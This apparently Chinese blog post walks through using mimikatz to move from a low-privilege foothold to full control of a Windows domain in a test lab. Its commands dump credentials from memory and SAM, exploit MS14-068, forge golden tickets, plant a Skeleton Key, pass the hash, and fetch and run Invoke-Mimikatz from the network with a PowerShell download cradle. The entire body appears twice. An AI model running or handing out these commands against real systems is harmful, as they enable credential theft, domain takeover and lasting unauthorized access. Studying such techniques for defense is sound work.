内网渗透中的mimikatz
2016-01-23 17:47
225 查看
0x00 前言
上篇测试了中间人攻击利用框架bettercap,这次挑选一款更具代表性的工具——mimikatz
0x01 简介
mimikatz,很多人称之为密码抓取神器,但在内网渗透中,远不止这么简单
0x02 测试环境
网络资源管理模式:
域
已有资源:
域内一台主机权限
操作系统:win7 x64
域权限:普通用户
0x03 测试目标
1、获得域控权限 2、导出所有用户口令 3、维持域控权限
0x04 测试过程
1、获取本机信息
mimikatz:
privilege::debug
sekurlsa::logonpasswords
获取本机用户名、口令、sid、LM hash、NTLM hash 如图
2、攻击域控,获得权限
使用ms14-068漏洞
ms14-068.exe -u -p -s -d
生成伪造缓存test.ccache:
如图
导入伪造缓存: mimikatz:
kerberos::ptc test.ccache
登陆:
net use \\A-635ECAEE64804.TEST.LOCAL
dir \\A-635ECAEE64804.TEST.LOCAL\c$
获得域控权限,如图
3、导出域控信息
(1)直接获取内存口令 mimikatz:
privilege::debug
sekurlsa::logonpasswords
(2)通过内存文件获取口令
使用procdump导出lsass.dmp mimikatz:
sekurlsa::minidump lsass.dmp
sekurlsa::logonPasswords full
(3)通过powershell加载mimikatz获取口令
powershell IEX (New-Object Net.WebClient).DownloadString('https://raw.githubusercontent.com/mattifestation/PowerSploit/master/Exfiltration/Invoke-Mimikatz.ps1'); Invoke-Mimikatz
(4)导出所有用户口令
使用Volue Shadow Copy获得SYSTEM、SAM备份(之前文章有介绍)mimikatz:
lsadump::sam SYSTEM.hiv SAM.hiv
4、维持域控权限
(1)Skeleton Key mimikatz:
privilege::debug
misc::skeleton
万能钥匙,可使用任意用户登陆域控
net use \\A-635ECAEE64804.TEST.LOCAL mimikatz /user:test
如图
(2)golden ticket mimikatz:
lsadump::lsa /patch
获取krbtgt的ntlmhash,如图
生成万能票据: mimikatz:
kerberos::golden /user:Administrator /domain:test.local /sid:S-1-5-21-2848411111-3820811111-1717111111 /krbtgt:d3b949b1f4ef947820f0950111111111 /ticket:test.kirbi
导入票据: mimikatz:
kerberos::ptt test.kirbi
登陆域控:
net use \\A-635ECAEE64804.TEST.LOCAL
dir \\A-635ECAEE64804.TEST.LOCAL\c$
如图
Tips:
Golden Ticket不多说,自行理解
By default, the Golden Ticket default lifetime is 10 years
password changing/smartcard usage does not invalidate Golden Ticket;
this ticket is not emitted by the real KDC, it's not related to ciphering methods allowed;
NTLM hash of krbtgt account is never changed automatically.
(3)Pass-The-Hash mimikatz:
sekurlsa::pth /user:Administrator /domain:test.local /ntlm:cc36cf7a8514893efccd332446158b1a
如图
5、补充
登陆域控,刷新扫雷记录,留下名字;D mimikatz:
minesweeper::infos
如图
0x05 小结
本文重点在于介绍mimikatz在内网渗透中的常用方法,其它细节做了适当省略,可在后续详细介绍细节。
上篇测试了中间人攻击利用框架bettercap,这次挑选一款更具代表性的工具——mimikatz
0x01 简介
mimikatz,很多人称之为密码抓取神器,但在内网渗透中,远不止这么简单
0x02 测试环境
网络资源管理模式:
域
已有资源:
域内一台主机权限
操作系统:win7 x64
域权限:普通用户
0x03 测试目标
1、获得域控权限 2、导出所有用户口令 3、维持域控权限
0x04 测试过程
1、获取本机信息
mimikatz:
privilege::debug
sekurlsa::logonpasswords
获取本机用户名、口令、sid、LM hash、NTLM hash 如图
2、攻击域控,获得权限
使用ms14-068漏洞
ms14-068.exe -u -p -s -d
生成伪造缓存test.ccache:
如图
导入伪造缓存: mimikatz:
kerberos::ptc test.ccache
登陆:
net use \\A-635ECAEE64804.TEST.LOCAL
dir \\A-635ECAEE64804.TEST.LOCAL\c$
获得域控权限,如图
3、导出域控信息
(1)直接获取内存口令 mimikatz:
privilege::debug
sekurlsa::logonpasswords
(2)通过内存文件获取口令
使用procdump导出lsass.dmp mimikatz:
sekurlsa::minidump lsass.dmp
sekurlsa::logonPasswords full
(3)通过powershell加载mimikatz获取口令
powershell IEX (New-Object Net.WebClient).DownloadString('https://raw.githubusercontent.com/mattifestation/PowerSploit/master/Exfiltration/Invoke-Mimikatz.ps1'); Invoke-Mimikatz
(4)导出所有用户口令
使用Volue Shadow Copy获得SYSTEM、SAM备份(之前文章有介绍)mimikatz:
lsadump::sam SYSTEM.hiv SAM.hiv
4、维持域控权限
(1)Skeleton Key mimikatz:
privilege::debug
misc::skeleton
万能钥匙,可使用任意用户登陆域控
net use \\A-635ECAEE64804.TEST.LOCAL mimikatz /user:test
如图
(2)golden ticket mimikatz:
lsadump::lsa /patch
获取krbtgt的ntlmhash,如图
生成万能票据: mimikatz:
kerberos::golden /user:Administrator /domain:test.local /sid:S-1-5-21-2848411111-3820811111-1717111111 /krbtgt:d3b949b1f4ef947820f0950111111111 /ticket:test.kirbi
导入票据: mimikatz:
kerberos::ptt test.kirbi
登陆域控:
net use \\A-635ECAEE64804.TEST.LOCAL
dir \\A-635ECAEE64804.TEST.LOCAL\c$
如图
Tips:
Golden Ticket不多说,自行理解
By default, the Golden Ticket default lifetime is 10 years
password changing/smartcard usage does not invalidate Golden Ticket;
this ticket is not emitted by the real KDC, it's not related to ciphering methods allowed;
NTLM hash of krbtgt account is never changed automatically.
(3)Pass-The-Hash mimikatz:
sekurlsa::pth /user:Administrator /domain:test.local /ntlm:cc36cf7a8514893efccd332446158b1a
如图
5、补充
登陆域控,刷新扫雷记录,留下名字;D mimikatz:
minesweeper::infos
如图
0x05 小结
本文重点在于介绍mimikatz在内网渗透中的常用方法,其它细节做了适当省略,可在后续详细介绍细节。
相关文章推荐
- Linux下中间人攻击利用框架bettercap测试
- Metasploit渗透技巧:后渗透Meterpreter代理
- 第17章 标准库特殊设施
- linux服务器安全配置10大技巧
- win环境下使用sqlmap写shell + MYSQL提权(默认就是system权限)
- nmap速查表v1.0(中文版)
- WebDAV漏洞直接远程溢出拿下服务器
- [TOP10]最受欢迎的10个Metasploit模块和插件
- DIY简单功能的torrentkitty种子爬虫
- XSS获取cookie并利用
- 使用UEFI+GPT模式安装Windows
- Fiddler 教程
- 一次xss的黑盒挖掘和利用过程
- Android App 注射&&Drozer Use
- php截取后台登陆密码的代码
- 通用型正方教务(通杀各版本)存在注入(不需登陆)+获得webshell+提权内网漫游
- 密码重置漏洞案例
- post注入及提权思路
- MySQL提权之user.MYD中hash破解方法
- 导出当前域内所有用户hash的技术整理